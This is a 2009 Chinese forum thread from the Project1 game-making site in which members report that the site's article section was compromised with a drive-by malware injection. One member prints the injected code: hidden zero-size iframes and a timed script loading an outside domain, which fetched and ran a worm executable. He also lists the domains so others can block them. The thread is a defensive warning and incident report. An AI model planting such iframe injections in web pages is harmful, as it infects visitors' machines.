Project1

标题: 主站MS被挂马 [打印本页]

作者: thearefunny 时间: 2009-3-8 07:55
标题: 主站MS被挂马
去多点点就知道了 [LINE]1,#dddddd[/LINE]本贴由论坛斑竹影北山人结贴，如楼主认为问题未解决，请重新将此贴编辑为“有事请教”，并回帖叙述疑点即可～ ^-^

作者: 凌辰 时间: 2009-3-8 07:56
……有什么具体反应么……

作者: thearefunny 时间: 2009-3-8 07:57
点击"文章作品" 然后网页加载完后页面代码变成然后瑞星提示有马

作者: 精灵使者 时间: 2009-3-8 08:16
确认提示有马，而且有一个OK1.EXE被遨游拦截。 经精灵亲自侦测，2008年3月7日晚上23时55分左右主站的文章分类下被挂马，打开文章分区以后进入以下页面：

<iframe src=http://v.6t65r.cn/01/ width=0 height=0></iframe><script>function re(){document.write('<iframe src=http://v.6t65r.cn/01/ width=0 height=0></iframe>');}setInterval('re()',9000);</script><iframe src=http://v.6t65r.cn/01/ width=0 height=0></iframe><iframe src=http://v.6t65r.cn/01/ width=0 height=0></iframe><iframe src=http://v.6t65r.cn/01/ width=0 height=0></iframe><iframe src=http://v.6t65r.cn/01/ width=0 height=0></iframe><iframe src=http://v.6t65r.cn/01/ width=0 height=0></iframe>
复制代码

主要下载并执行文件： ｈｔｔｐ：／／ｗ１．ｇｅｔｄｅｗ．ｃｎ／０１／ｏｋ１．ｅｘｅ并且运行。 经NOD报毒为win32/autorunADC 蠕虫的变种病毒。 所以大家访问的时候请将下列网站加入屏蔽列表并且加入不信任区域： ｈｔｔｐ：／／ｖ．６ｔ５６ｒ．ｃｎ／ ｈｔｔｐ：／／ｗ１．ｇｅｔｄｅｗ．ｃｎ／ 由于这些网站为病毒网站，所以请将其改为小写并加入屏蔽列表，切记！ 精灵将密切关注此事。

作者: jzly007 时间: 2009-3-8 16:57
原来是个木马，~害我又从装了次系统~~~~~~~~~~~~~~~~~~

作者: 雷欧纳德 时间: 2009-3-9 01:58
似乎的确有点问题。。。。大家先别点文章页面

作者: 精灵使者 时间: 2009-3-9 02:21

以下引用雷欧纳德于2009-3-8 17:58:19的发言：

似乎的确有点问题。。。。大家先别点文章页面

我已经找到源头了。
看我的日志……
http://blog.sina.com.cn/s/blog_56a2f0930100cdul.html

欢迎光临 Project1 (https://rpg.blue/)